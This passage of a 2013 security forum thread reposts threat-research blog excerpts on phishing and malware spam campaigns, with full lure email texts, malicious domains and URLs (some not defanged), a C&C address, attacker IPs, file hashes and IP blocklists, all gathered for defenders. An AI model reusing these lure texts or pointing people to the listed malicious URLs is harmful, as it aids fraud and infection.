• HTML_IFRAME.USR then downloads another malware onto the system, TROJ_PIDIEF.USR, which in turn drops BKDR_KRIDEX.KA. This final payload, being backdoor malware, has the ability to perform commands from a remote malicious user, and therefore can compromise a system’s security.
While there is nothing new in this routine, users are still advised to always perform account-related changes only the websites they subscribe to. We also point towards the usage of CRIDEX as a final payload – a malware family that we’ve written about as one of the two families used in BHEK attacks. Like ZBOT, CRIDEX is used mainly to steal online banking information. To further protect themselves from these sort of threats, users should ensure that all software in their systems are updated and patched (namely Java, Adobe Acrobat, Adobe Reader, and Flash). This is because BHEK operates by exploiting vulnerabilities in popular software, and having those software plus their browser of choice can help prevent them from becoming victims. Avoiding links presented in suspicious mails and verifying the mail’s content first by contacting the supposed sender through other means (phone call, visitation) can also go a long way..."
:fear: :mad:
AplusWebMaster
2013-07-05, 20:23
FYI...
Fake EBC Password Reset Confirmation SPAM / paynotice07 .net
- http://blog.dynamoo.com/2013/07/ebc-password-reset-confirmation-spam.html
5 July 2013 - "This fake password reset spam leads to malware on paynotice07 .net:
From: EBC_EBC1961Registration@ebank6 .secureaps .com
Sent: 05 July 2013 12:27
Subject: Password Reset Confirmation
Your Online Bankking password was successfully changed on 07/05/2013. If you did not make this change, or if you have any questions, please contact EBC Technical Support using this link.
Support is available Monday - Friday, 8 AM to 8 PM CST.
This is an automated message, please do not reply. Your message will not be received...
The link goes through a legitimate -hacked- site and ends up on a payload at [donotclick]paynotice07 .net/news/must-producing.php (report here*) hosted on the following IPs:
189.84.25.188 (DataCorpore Serviços e Representações, Brazil)
202.28.69.195 (Walailuk University, Thailand)
Blocklist:
189.84.25.188
202.28.69.195 ..."
* http://urlquery.net/report.php?id=3554479
___
Invoice Export License Spam
- http://threattrack.tumblr.com/post/54688403070/invoice-export-license-spam
July 5, 2013 - "Subjects Seen:
invoice copy
Typical e-mail details:
Kindly open to see export License and payment invoice attached,
meanwhile we sent the balance payment yesterday.
Please confirm if it has settled in your account or you can call if
there is any problem.
Thanks
Karen parker
Malicious File Name and MD5:
invoice copy.zip (5e58effccB7dfbe81910fefaf17766d9)
invoice copy (2).exe (d70ab58ee9fffd968c3e7327adbb550e)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/882a8e3833f315615be3221f5111ce20/tumblr_inline_mph7z9ValW1qz4rgp.png
:mad:
AplusWebMaster
2013-07-08, 19:38
FYI...
Fake AMEX SPAM - americanexpress .com.krasalco .com
- http://blog.dynamoo.com/2013/07/amex-spam-americanexpresscomkrasalcocom.html
8 July 2013 - "This fake Amex spam leads to malware on americanexpress .com.krasalco .com:
From: American Express [mailto:AmericanExpress @emalsrv.aexpmail .org]
Sent: 08 July 2013 15:00
Subject: Account Alert: A Payment Was Received
Check your account balance online at any time
Hello, [redacted]
View Account
Make a Payment
Manage Alerts Preferences
Payment Received
Check Balance
We received a payment for your Card account.
Date Received:
Mon, Jul 08, 2013
Payment Amount:
$2,511.92
Payments received after 8PM MST may not be credited until the next day. Please allow 24-48 hours for your payment to appear online.
Thank you for your Cardmembership.
American Express Customer Care
Was this e-mail helpful? Please click here to give us your feedback...
Screenshot: https://lh3.ggpht.com/-7XFKs5MUprk/UdrW3mejy1I/AAAAAAAABcg/0eXLit0ekC8/s400/amex.png
The link in the email goes through a legitimate -hacked- site to end up on a malicious landing page at [donoclick]americanexpress .com.krasalco .com/news/slightly_some_movie.php (report here*) hosted on the following IPs:
77.240.118.69 (Acens Technologies, Spain)
103.9.23.34 (TPL Trakker Ltd, Pakistan)
151.155.25.111 (Novell Inc, US)
202.28.69.195 (Uninet, Thailand)
Blocklist:
77.240.118.69
103.9.23.34
151.155.25.111
202.28.69.195 ..."
* http://urlquery.net/report.php?id=3606244
___
Fake Xerox WorkCentre Pro Spam
- http://threattrack.tumblr.com/post/54929354396/xerox-workcentre-pro-spam
July 8, 2013 - "Subjects Seen:
Scanned Image from a Xerox WorkCentre
Typical e-mail details:
Please open the attached document. It was scanned and sent to you using a Xerox WorkCentre Pro.
Sent by: [removed]
Number of Images: 6
Attachment File Type: ZIP [PDF]
WorkCentre Pro Location: Machine location not set
Device Name: [removed]
Attached file is scanned image in PDF format.
Malicious URLs
2ndtimearoundweddingphotography .com/ponyb/gate.php
bobkahnvideo .com/ponyb/gate.php
gfpmenusonline .com/ponyb/gate.php
gfponlineordering .com/ponyb/gate.php
lacasadelmovilusado .com/bts1.exe
common.karsak .com.tr/FzPfH6.exe
ftp(DOT)vickibettger .com/oEoASW64.exe
qualitydoorblog .com/qbSTq.exe
Malicious File Name and MD5:
SCAN_<random>.zip (da8f4d5dc27dd81c6e3eff217a6501ec)
SCAN_<random>.exe (59ee4453da8909e96762f2c8cd0d6f37)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/57a60624557c8734388e1cf5d49e11a2/tumblr_inline_mpmqr4FfuK1qz4rgp.png
___
Man of Steel, Fast and Furious 6 Among Online Fraudsters’ Most Used Lures
- http://blog.trendmicro.com/trendlabs-security-intelligence/man-of-steel-fast-and-furious-6-among-online-fraudsters-most-used-lures/
July 8, 2013 - "... Fraudsters are relentless in creating fake streaming sites, not just on the screening date of these movies, but also before the release of movies in theaters... attackers use various social media sites like Facebook, Google+, Youtube, LinkedIn, and many others to drive users to the fake streaming pages. These are hosted on blogging services like Tumblr, WordPress, and Blogger. Most pages on these blogs have shortened URLs that lead to the final sites... Because they used the services of URL shorteners, we were able to view the number of visits per selected movie. It appears that Man of Steel, Fast and the Furious 6 and Iron Man 3 got the highest number of viewers. This data is for a two-month period from late April up to the end of June.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/07/total-pageviews-chart.jpg
Total pageviews of fake streaming sites (per movie titles)
To lure in users, attackers use key phrases like “watch movie title online” or “download movie title free”. Using Blackhat Search Engine Optimization or BHSEO, users looking for the above pages are lured to visit the -fake- streaming sites. This is also known as one of the manipulation of search engine indexes in -spamdexing. Many of the common keywords used are what you’d expect: “watch”, “online”, “free”, etcetera. One of the more surprising keywords is “putlocker”, which refers to a UK-based file locker. In terms of countries involved, while the United States accounts for more than two-thirds of the traffic to these sites, other countries were also represented. Users are advised to stream and subscribe to -legitimate- sites and -not- from these fake streaming sites. Be wary of sharing posts and clicking links that could propagate these scams. In addition, there might be no such thing as online streaming or movie download except for pirated copies, which in itself can be risky..."
___
sendgrid .me / amazonaws .com SPAM
- http://blog.dynamoo.com/2013/07/sendgridme-amazonawscom-spam.html
8 July 2013 - "This spam is unusual in that it comes through an apparently genuine commercial email provider (sendgrid .me) and leads to malware hosted on Amazon's cloud service, amazonaws .com. There is no body text in the spam, just an image designed to look like a downloadable document.
from: [victim] via sendgrid .me
date: 8 July 2013 19:08
subject: Urgent 6:08 PM 244999
Signed by: sendgrid .me
Screenshot: https://lh3.ggpht.com/-w5tfHokyzRw/UdseyJUaf0I/AAAAAAAABc0/DlZ0NKkn0bw/s1600/pic848755.jpg
The email appears to originate from 138.91.78.32 which is a Microsoft IP, so that part of the mail header might be faked. It certainly comes through 208.117.55.132 (o1.f.az.sendgrid .net)
The text at the bottom says "Please find attached the document." but actually leads to a malicious executable at [donotclick]s3.amazonaws .com/ft556/Document_948357853____.exe [https] (VirusTotal report*) which then downloads a further executable from [donotclick]s3.amazonaws .com/mik49/ss32.exe [http] (VirusTotal report**) which installs itself into C:\Documents and Settings\Administrator\Application Data\ss32.exe. ThreatExpert reports*** that the downloader (the first executable) is hardened against VM-based analysis:
Is protected with Themida in order to prevent the sample from being reverse-engineered. Themida protection can potentially be used by a threat to complicate the manual threat analysis (e.g. the sample would not run under the Virtual Machine)... The second part (ss32.exe) attempts to lookup a server called mssql.maurosouza9899.kinghost .net 177.185.196.130 (IPV6 Internet Ltda, Brazil)... VirusTotal does report some other badness on 177.185.196.130 so this is probably worth blocking.
Recommended blocklist:
177.185.196.130 ..."
* https://www.virustotal.com/en/file/8d99f52cd686235919d473b5fbe49c96b22f9fe56d1784b01cdf1b55b87c1b92/analysis/1373309007/
File name: Document_948357853____.exe
Detection ratio: 15/46
Analysis date: 2013-07-08
** https://www.virustotal.com/en/file/cb7ceacc9cdbe1d140026bd2307681c6ba7aef69fd033ff26d588ea066a5d2dc/analysis/1373315068/
File name: ss32.exe
Detection ratio: 8/44
Analysis date: 2013-07-08
*** http://www.threatexpert.com/report.aspx?md5=d0b2d0f5b7e4b7adb6afe6928fa84c89
**** https://www.virustotal.com/en/ip-address/177.185.196.130/information/
:mad: :fear:
AplusWebMaster
2013-07-09, 19:20
FYI...
Malware sites to block 9/7/13
- http://blog.dynamoo.com/2013/07/malware-sites-to-block-9713.html
9 July 2013 - "These are the current IPs and domains that appear to be in use by this gang*. IPs are listed with hosting companies and countries first, and then a plain list of IPs and domains for copy-and-pasting (blocking)..."
(Long list at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika
___
Fake "Payment File Successfully Processed" SPAM / autorize .net.models-and-kits .net
- http://blog.dynamoo.com/2013/07/payment-file-successfully-processed.html
9 July 2013 - "This spam leads to malware on autorize.net.models-and-kits .net:
Date: Tue, 9 Jul 2013 15:36:42 -0500
From: batchprovider @eftps .gov
Subject: Payment File Successfully Processed
*** PLEASE DO NOT REPLY TO THIS MESSAGE***
Dear Batch Provider,
This message is being sent to inform you that your payment file has successfully processed. 2013-07-09-12.08.00.815358
Detailed information is available by logging into the Batch Provider software by clicking this link and performing a Sync request.
Thank You,
EFTPS
Contact Us: EFTPS Batch Provider Customer Service
at this link
A sender's email address of batchprovider @email.eftpsmail .gov is seen in another sample. The link goes through a legitimate -hacked- site and ends up an a malware laden page at [donotclick]autorize.net.models-and-kits .net/news/shortest-caused-race.php (report here**) hosted on:
77.240.118.69 (Acens Technlogies, Spain)
103.9.23.34 (TPL Trakker Ltd, Pakistan)
151.155.25.111 (Novell Inc, US)
202.28.69.195 (UniNet, Thailand)
All these IPs and more can be found in this recommended blocklist*. Out of these four IPs we can see the following malicious domains which should also be blocked if you can't block the IPs themselves..
77.240.118.69
103.9.23.34
151.155.25.111
202.28.69.195 ..."
(More detail at the dynamoo URL above.)
* http://blog.dynamoo.com/2013/07/malware-sites-to-block-9713.html
** http://wepawet.iseclab.org/view.php?hash=3e5eacbb6b311e0669adfaeea9476cb2&t=1373400740&type=js
:fear::fear:
AplusWebMaster
2013-07-10, 15:46
FYI...
Something evil on 199.231.93.182
- http://blog.dynamoo.com/2013/07/something-evil-on-19923193182.html
10 July 2013 - "199.231.93.182 (Webline Service, US suballocated to "Alex Capersov") is hosting a number of exploits [1] [2] being used in injection attacks. In the sample I saw, code had been injected into the legitimate site englishrussia .com possibly through a traffic exchanger. The following domains are all hosted on or are associated with this IP. There's a shorter list at the bottom of the post without the subdomains that you might want to use as a blocklist..."
(More detail at the dynamoo URL above.)
1) http://urlquery.net/search.php?q=199.231.93.182&type=string&start=2013-06-25&end=2013-07-10&max=50
2) https://www.virustotal.com/en/ip-address/199.231.93.182/information/
___
Fake Booking Reservation themed emails serve malware
- http://blog.webroot.com/2013/07/10/cybercriminals-spamvertise-tens-of-thousands-of-fake-your-booking-reservation-at-westminster-hotel-themed-emails-serve-malware/
July 10, 2013 - "Cybercriminals are currently mass mailing tens of thousands of fake emails impersonating the Westminster Hotel, in an attempt to trick users into thinking that they’ve received a legitimate booking confirmation. In reality through, once the socially engineered users execute the malicious attachments, their PCs automatically join the botnet operated by the cybercriminals behind the campaign...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/07/email_spam_malware_malicious_software_social_engineering_westminster_hotel_fake_booking.png?w=465&h=587
Detection rate for the malicious attachment – MD5: 7eed403cfd09ea301c4e10ba5ed5148a * ... Trojan-PSW.Win32.Tepfer.nprd.
The UPX compressed executable creates an Alternate Data Stream (ADS), starts at Windows startup... It then phones back to the following C&C server:
hxxp :// 62.76.178.178 /fexco/com/index.php
We’ve already seen the same C&C directory structure in the previous profiled ‘Fake ‘Vodafone U.K Images’ themed malware serving spam campaign circulating in the wild‘ campaign... While we were investigating this campaign, we also found out that, apparently, the Westerminster Hotel in Rhyl, Denbighshire, did not renew their primarily domain name (westminster-rhyl.com – 64.74.223.31), allowing opportunistic ‘domainers’ to quickly snatch it. Not surprisingly, we also detected malicious activity with multiple malicious software phoning back to the current hosting IP of the Web site of the Westerminster Hotel in Rhyl, Denbighshire...
> https://webrootblog.files.wordpress.com/2013/07/westminster_hotel_rhyl_malware_malicious_software_google_maps.png?w=869
... MD5s known to have phoned back to the same IP (64.74.223.31) ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/b626adbaf7e78c70ce7d71a91e327afb7a3b7d73ecd7d8f20732c9cb182aa457/analysis/1373366558/
File name: Document.pdf .exe
Detection ratio: 6/47
Analysis date: 2013-07-09
___
Fake Visa SPAM / estateandpropertty.com and clik-kids .com
- http://blog.dynamoo.com/2013/07/visa-spam-estateandproperttycom-and.html
10 July 2013 - "This fake Visa spam attempts to lead to malware on estateandpropertty .com:
Date: Wed, 10 Jul 2013 13:20:38 -0300 [12:20:38 EDT]
From: Visa [policemank3 @newsletters.visabusinessnewsmail .org]
Reply-To: flintierv34 @complains .visabusinessnewsmail .org
Subject: Update Your Business Visa Card Information
Your Visa Business card has been limited. Please update your information to reactivate your account.
Please proceed the link: http ://visabusiness .com/ fraud/warning_mail=81413185766854518964...96368, update necessary information and view further information that caused us to set a limit.
Your Case ID is: NW61826321176497
Look for unexpected charges or questionable activity, and if you see anything suspicious,don't wait to act.
This added security is to prevent any additional fraudulent charges from taking place on your account...
Please be advised that the Information may constitute material nonpublic information under U.S. federal securities laws and that purchasing or selling securities of Visa Inc. while being aware of material nonpublic information would constitute a violation of applicable U.S. federal securities laws. This information may change from time to time. Please contact your Visa representative to verify current information. Visa is not responsible for errors in this publication. The Visa Non-Disclosure Agreement can be obtained from your Visa Account Manager or the nearest Visa Office.
This message was sent to you by Visa, P.O. Box 8999, San Francisco, CA 94128. Please click here to unsubscribe.
The link in the email goes through a legitimate -hacked- site and then attemped to go to a malware page at [donotclick]estateandpropertty .com/news/visa-report.php (report here*) but it appears the registrar has -nuked- the domain, so the spammers have switched the link to [donotclick]clik-kids .com/news/visa-report.php (report here**) instead. IPs involved are:
46.45.182.27 (Radore Veri Merkezi Hizmetleri, Turkey)
77.240.118.69 (Acens Technlogies, Spain)
150.244.233.146 (Universidad Autonoma De Madrid, Spain)
203.236.232.42 (KINX, Korea)
209.222.67.251 (Razor Inc, US)
Recommended blocklist:
46.45.182.27
77.240.118.69
150.244.233.146
203.236.232.42
209.222.67.251 ..."
* http://urlquery.net/report.php?id=3651712
** http://urlquery.net/report.php?id=3653370
:fear::mad:
AplusWebMaster
2013-07-11, 15:01
FYI...
Fake "WTX Media INC" SPAM / dajizzum .com
- http://blog.dynamoo.com/2013/07/wtx-media-inc-spam-dajizzumcom.html
11 July 2013 - "This fake invoice spam from the nonexistant "WTX Media" leads to a malware landing page on dajizzum .com:
From: Rebecca Media [mailto:support @rebeccacella .com]
Sent: 11 July 2013 07:46
To: [redacted]
Subject: Subscription Details
We hereby inform you that your subscription has been activated, your login information is as follows:
Username: IX9322130
Password: X#(@kIE04N
Login Key: 839384
Please do not share the login information with anyone as this account is only for your use, sharing the account will result in account termination without a refund.
The credit card on file submited by you will be billed within 24 hours, in the amount of 499.00 GBP, amount equal to one year unlimited subscription.
Your bank statement will show up as being billed by "WTX Media INC".
If you have any questions or issues with your login as well as requests to upgrade or cancel your membership please contact us using the form at:
[donotclick]www.rebeccacella .com/wp-content/plugins/subscribe/
Any feedback is appreciated as we strive to improve our services constantly.
WTX Media Team
The link in the email goes through a legitimate but -hacked- website (rebeccacella .com) and lands on a malware landing page at [donotclick]dajizzum .com/team/administration/admin4_colon/fedora.php?view=44 (report here*) which contains an exploit kit. dajizzum .com is hosted on 109.123.100.219 (UK2.NET, UK) which appears to be a -hijacked- server. At the moment I can only see that one site hosted on this box, but -blacklisting- the IP as a precaution may be wise. The spam originates from another malware server on 188.138.89.106 (more of this later) but it appears to use a compromised 1&1 account as the spamvertised domain, sender's address and SMTP relay of 212.227.29.10 all belong to that provider."
* http://urlquery.net/report.php?id=3664350
___
Malware sites to block 11/7/13
- http://blog.dynamoo.com/2013/07/malware-sites-to-block-11713.html
11 July 2013 - "I noticed 188.138.89.106 (Intergenia AG, Germany) was the originating IP being used in this spam run* using a -hijacked- 1&1 account, and VirusTotal thinks that the server is pretty darned evil**. A quick poke at this box shows that has a number of multihomed malicious and C&C domains. Looking at some of these servers, I'm suspicious that they may have been compromised using a Plesk vulnerability***. Various domains are used for botnets, including some Bitcoin miners. There may be some formerly legitimate domains in this mix, but given the compromised nature of the servers I would not trust them.
37.123.112.147 (UK2.NET, UK)
37.123.113.7 (UK2.NET, UK)
68.169.38.143 (Westhost Inc, US)
68.169.42.177 (Westhost Inc, US)
74.208.133.134 (1&1, US)
85.25.86.198 (Intergenia AG, Germany)
109.123.95.8 (UK2.NET, UK)
188.138.89.106 (Intergenia AG, Germany)
212.53.167.13 (FASTCOM IP Net, Poland)
212.227.53.20 (1&1, Germany)
212.227.252.92 (1&1, Germany)
213.165.71.238 (1&1, Germany)
217.160.173.154 (1&1, Germany)
Recommended blocklist:
37.123.112.147
37.123.113.7
68.169.38.143
68.169.42.177
74.208.133.134
85.25.86.198
109.123.95.8
188.138.89.106
212.53.167.13
212.227.53.20
212.227.252.92
213.165.71.238
217.160.173.154 ..."
* http://blog.dynamoo.com/2013/07/wtx-media-inc-spam-dajizzumcom.html
** https://www.virustotal.com/en/ip-address/188.138.89.106/information/
*** http://threatpost.com/irc-botnet-leveraging-unpatched-plesk-vulnerability
___
Facebook Phish leads to Fake Flash and Mining
- http://www.threattracksecurity.com/it-blog/facebook-phish-leads-to-fake-flash-and-mining/
July 10, 2013 - "... A new scam has emerged, this time using Tumblr as the launchpad to redirect end-users to a Facebook credential phish (including the collection of the answer to a secret question). At the end of the journey, victims will come across a fake Flash Player install touting the same fake landing page the old attack made use of, while adding a fresh sting in the tail. There’s a message which has been seen on some Facebook profiles doing the rounds at the moment, which reads as follows:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/minespam1.jpg
With a link to...
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/minespam2-300x226.jpg
The spamblog Tumblr will attempt to redirect end-users to a -fake- Facebook login:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/minespam3.jpg
After handing over their login, the end-user is then asked to surrender the answer to a security question of their own choosing:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/minespam4.jpg
Finally, they will arrive at the fake Flash player page – identical to the ones used in the 2012 spam runs on Twitter. While the message is the same:
“An update for Youtube player is needed
The Flash player update 10.1 includes
* Smoother video with hardware accelleration support
* Enhanced performance and memory management
* Support for multi-touch and gesture-enabled content
* Private browsing support and security enhancements”
…the downloaded file and intent are rather different.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/minespam5.jpg
Here’s what it looks like on the desktop, along with information from the Properties tab:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/minespam7.jpg
... It appears that once they’re done redirecting you to fake Facebook pages, stealing your login / security question information and loading up a fake video page they then want your PC to go mining (most likely Bitcoin, though the files aren’t displaying much activity at time of writing). The domain involved contains numerous files, some of which are password protected and won’t be downloadable unless the infected PC is following the correct “steps”. A compromised machine will attempt to download a proxy and a miner..."
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/minespam8.jpg
:fear: :mad: :fear:
AplusWebMaster
2013-07-12, 18:03
FYI...
Fake TAX Return Reminder SPAM / cpa.state.tx .us.tax-returns.mattwaltererie .net
- http://blog.dynamoo.com/2013/07/tax-return-reminder-cpastatetxustax.html
12 July 2013 - "This fake tax return reminder leads to malware on cpa.state.tx.us.tax-returns.mattwaltererie .net:
--- Version 1 --------------------
Date: Fri, 12 Jul 2013 14:35:31 +0300
From: DO.NOT.REPLY @REMINDER.STATE .TX .US.GOV
Subject: TAX Return Reminder
After the last quarter calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of $964.17. Please submit the tax refund request and allow us 2-5 business days to process it.
A refund can be delayed for a variety of reasons.
For example submitting invalid records or applying after deadline
Returns can be electronically filed at www .cpa.state.tx .us/returns_caseid=035549412645
For security reasons we will record your IP address, date and time.
Deliberate scam inputs are criminally pursued and indicated.
Please do not reply to this e-mail.
Please disregard this reminder if the return has already been submitted.
--- Version 2 --------------------
Date: Fri, 12 Jul 2013 17:05:39 +0530 [07:35:39 EDT]
From: tax.help @STATE.TX .GOV .US
Subject: TAX Return Reminder
After the last quarter calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of $909.70. Please submit the tax refund request and allow us 2-3 business days to process it.
A refund may be delayed for a variety of reasons.
For example submitting invalid records or applying after deadline
Returns can be electronically filed at www .cpa.state.tx .us/returns_caseid=488702484517
For security reasons we will record your IP address, date and time.
Deliberate wrong inputs are criminally pursued and indicated.
Please do not reply to this e-mail.
Please disregard this reminder if the return has already been submitted.
Unusually, the link in the email goes directly to the malware landing page rather than going through a legitimate -hacked- site, in this case directly to [donotclick]cpa.state.tx.us.tax-returns.mattwaltererie .net/news/tax_refund-caseid7436463593.php?[snip] (example 1*, example 2**) but I cannot get the malware to reveal itself (there's either a fault or it is resistant to analysis).
cpa.state.tx.us.tax-returns.mattwaltererie .net is hosted on the following IP addresses that are under control of what I call the Amerika gang:
46.45.182.27 (Radore Veri Merkezi Hizmetleri A.S., Turkey)
150.244.233.146 (Universidad Autonoma de Madrid, Spain)
203.236.232.42 (KINX, Korea)
209.222.67.251 (Razor Inc, US)
The domain mattwaltererie .net also features the fake US WHOIS details that are characteristic of the Amerika gang (which is where they get their name from)...
Below is a partial blocklist that I would recommened you use in conjunction with this one:
46.45.182.27
150.244.233.146
203.236.232.42
209.222.67.251 ..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=3689715
** http://urlquery.net/report.php?id=3688402
:sad::mad::fear:
AplusWebMaster
2013-07-15, 15:36
FYI...
Spamvertised emails lead to Casino PUAs
- http://blog.webroot.com/2013/07/15/tens-of-thousands-of-spamvertised-emails-lead-to-the-win32primecasino-pua-potentially-unwanted-application/
July 15, 2013 - "... You may want to skip the rogue online casinos... Over the past few days, we intercepted multiple spam campaigns launched by the same party, enticing users into downloading -fake- online casinos most commonly known as the Win32/PrimeCasino/Win32/Casonline PUA (Potentially Unwanted Application)...
Sample screenshots of the landing pages:
> https://webrootblog.files.wordpress.com/2013/07/email_spam_royalvegas_w32-casonline_fake_casino_rogue_casino_potentially_unwated_application_pua.png?w=675&h=536
.
> https://webrootblog.files.wordpress.com/2013/07/email_spam_royalvegas_w32-casonline_fake_casino_rogue_casino_potentially_unwated_application_pua_01.png?w=711&h=532
.
> https://webrootblog.files.wordpress.com/2013/07/email_spam_royalvegas_w32-casonline_fake_casino_rogue_casino_potentially_unwated_application_pua_02.png?w=741&h=328
... (More screenshots shown at the first webroot URL above.) ...
Rogue domains reconnaissance:
royalvegascasino .com – 193.169.206.146
888casino .com – 213.52.252.59
spinpalace .com – 109.202.114.65
riverbelle1 .com – 193.169.206.233
alljackpotscasino .com – 64.34.230.122
luckynuggetcasino .com – 67.211.111.163
allslotscasino .com – 64.34.230.149; 205.251.192.125; 205.251.195.210; 205.251.196.131; 205.251.199.63 ...
Detection rates for the Potentially Unwanted Applications (PUAs):
AllJackpots.exe – MD5: fed4e5ba204f3b3034b882481a6ab002 ... Win32/PrimeCasino; W32/Casino.P.gen!Eldorado; PUP.PrimeCasino
luckynugget.exe – MD5: 1e97ddc0ed28f5256167bd93f56a46b2 ... GAME/Casino.Gen; W32/Casino.P.gen!Eldorado;
Riverbelle.exe – MD5: 1828fc794652e653e6083c204d3b1f34 ... GAME/Casino.Gen; W32/Casino.P.gen!Eldorado
RoyalVegas.exe – MD5: 2dd87b67d4b7ca7a1bfae2192b09f8e6 ... GAME/Casino.Gen; W32/Casino.P.gen!Eldorado
Rogue casino domains... responded to 193.169.206.146 ..."
(More detail at the first webroot URL above.)
___
Half-Life 3 Fakeout...
- http://www.threattracksecurity.com/it-blog/the-half-life-3-fakeout-roundup/
July 15, 2013 - "Half-Life 3: it doesn’t exist. This short, brutal truth doesn’t mean there aren’t a lot of Half Life 3 fakeouts doing the rounds. For example, here’s a fake Steam Store page located at store(dot)stearnpowered(dot)com... The real thing would be store(dot)steampowered(dot)com – they’re likely banking on end-users not noticing the join between the “r” and the “n”... There’s a lot of so-called “Half-Life 3 giveaway” sites online, and – amazingly enough – -none- of those sites are going to give you Half-Life 3... Halflife3beta(dot)com, which takes the tried and tested survey scam route (complete with fake “Downloads allowed” graphic at the bottom of the survey splash)... If and when Half-Life 3 ever arrives, the first you hear about it won’t be on some obscure domains serving up deals and offers. Keep your wits, your skepticism and your crowbar handy…"
Fake Wiki in the Wild Wild Web
- http://www.threattracksecurity.com/it-blog/fake-wiki-in-the-wild-wild-web/
July 15, 2013 - "If you happen to make a mess of typing up the Wikipedia domain, you could in theory wind up at the following address which is clearly hoping for some finger-related typo malfunction traffic: wikipeida(dot)org
As you can see, it isn’t far off from the real thing. What lurks there? This:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/fakewiki1.jpg
... The end-user is presented with 3 meaningless questions then asked to choose their final “I’m being marketed to” destination... As far as typosquatting well known sites with the intention of driving traffic to surveys goes, this is a well worn trick and – one would hope – not something a person looking for Wikipedia would fall for..."
___
NOST (NOST.QB) / NSU Resources Inc Pump and Dump SPAM
- http://blog.dynamoo.com/2013/07/nostqb-nsu-resources-inc-pump-and-dump.html
15 July 2013 - "Over the weekend a pump-and-dump spam* run started for NSU Resources Inc trading as NOST.QB **. NSU Resources almost definitely have -nothing- to do with this spam run...
Subject: This Stock MOVED HARD...
Subject: This Stock Is The Hottest Stock In The Whole Market!...
Subject: They`ve got their rally caps on!...
Subject: Look for Another Push Higher...
... we can expect to see NOST spam for a while yet as the spammer - and perhaps whoever employed them - try to offload worthless shares onto unsuspecting investors. Avoid."
* http://en.wikipedia.org/wiki/Pump_and_dump
** http://www.nasdaq.com/symbol/nost
___
Bank of America Paymentech SPAM
- http://threattrack.tumblr.com/post/55513649492/bank-of-america-paymentech-spam
15 July 2013 - "Subjects Seen:
Merchant Statement
Typical e-mail details:
Attached (pdflPDF|pdf file|document|file) is your Bank of America Paymentech electronic Merchant Billing Statement.
If you need assistance, please (contact|message|call) your Account Executive or call Merchant Services at the telephone number listed on your statement.
PLEASE DO NOT RESPOND BY USING REPLY. This (email|mail) is sent from an unmonitored email address, and your response will not be received by Bank of America Paymentech.
Bank of America Paymentech will not be responsible for any liabilities that may result from or relate to any failure or delay caused by Bank of America Paymentech’s or the Merchant’s email service or otherwise. Bank of America Paymentech recommends that Merchants continue to monitor their statement information regularly.
Malicious File Name and MD5:
stid <random>.zip (d8f8701b9485f7a2215da9425c5af7d6)
stid <random>.exe (198385457408361504c7ccac9d67bd3e)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/1017d3aa7507cd96fe605fb53643b9ce/tumblr_inline_mpzfdgPrth1qz4rgp.png
___
Fake UPS SPAM / tvblips .net
- http://blog.dynamoo.com/2013/07/ups-spam-tvblipsnet.html
15 July 2013 - "This fake UPS spam leads to malware on tvblips .net:
Date: Mon, 15 Jul 2013 10:20:13 -0500
From:
Subject: Your UPS Invoice is Ready
This is an automatically generated email. Please do not reply to this email address.
Dear UPS Customer,
Thank you for your business.
New invoice(s) are available for the consolidated payment plan(s) / account(s) enrolled in the UPS Billing Center.
Please visit the UPS Billing Center to view and pay your invoice.
Questions about your charges? To get a better understanding of surcharges on your invoice, click here..."
The link in the email goes to a legitimate -hacked- site that has some highly obfuscated javascript that leads to a malware landing page on [donotclick]tvblips .net/news/ups-information.php (report here*) hosted on:
46.45.182.27 (Radore Veri Merkezi Hizmetleri, Turkey)
209.222.67.251 (Razor Inc, US)
Recommended blocklist:
46.45.182.27
209.222.67.251 ..."
* http://urlquery.net/report.php?id=3762051
___
Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Bank Payment Information Email Message - 2013 Jul 15
Fake Shipping Invoice Notification Email Messages - 2013 Jul 15
Email Messages with Malicious Attachments - 2013 Jul 15
Fake Bank Payment Confirmation Email Messages - 2013 Jul 15
Fake Bank Deposit Confirmation Email Messages - 2013 Jul 15
Fake CashPro Online Digital Certificate Notification Email Message - 2013 Jul 15
Fake Online Dating Proposal Email Messages - 2013 Jul 15
Fake Product Quote Request Email Messages - 2013 Jul 15
Fake Order Document Email Attachment Messages - 2013 Jul 15
Fake Photo Email Messages - 2013 Jul 15
Fake Canceled Electronic Payment Notification Email Message - 2013 Jul 15
Fake Telegraphic Transfer Notification Email Messages - 2013 Jul 15
Fake Receipt Attachment Email Messages - 2013 Jul 15
Fake Purchase Order Notification Email Messages - 2013 Jul 15
Fake Billing Statement Email Messages - 2013 Jul 15
Fake Financial Document Delivery Email Messages - 2013 Jul 15
Fake CashPro Online Digital Certificate Notification Email Messages - 2013 Jul 15
Fake Product Order Email Messages - 2013 Jul 15
Fake Money Transfer Notification Email Messages - 2013 Jul 15
(More detail and links at the cisco URL above.)
:fear::mad::fear:
AplusWebMaster
2013-07-16, 15:43
FYI...
Malware sites to block 16/7/13
- http://blog.dynamoo.com/2013/07/malware-sites-to-block-16713.html
16 July 2013 - "These domains and IPs are associated with this gang*. This time there appear to be some diet pill sites in the mix, these may be spammy or they may be malicious.. I would recommend blocking them -all- ..."
(Long list available at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika
___
Photo Attachment Spam
- http://threattrack.tumblr.com/post/55603808587/photo-attachment-spam
July 16, 2013 - "Subjects Seen:
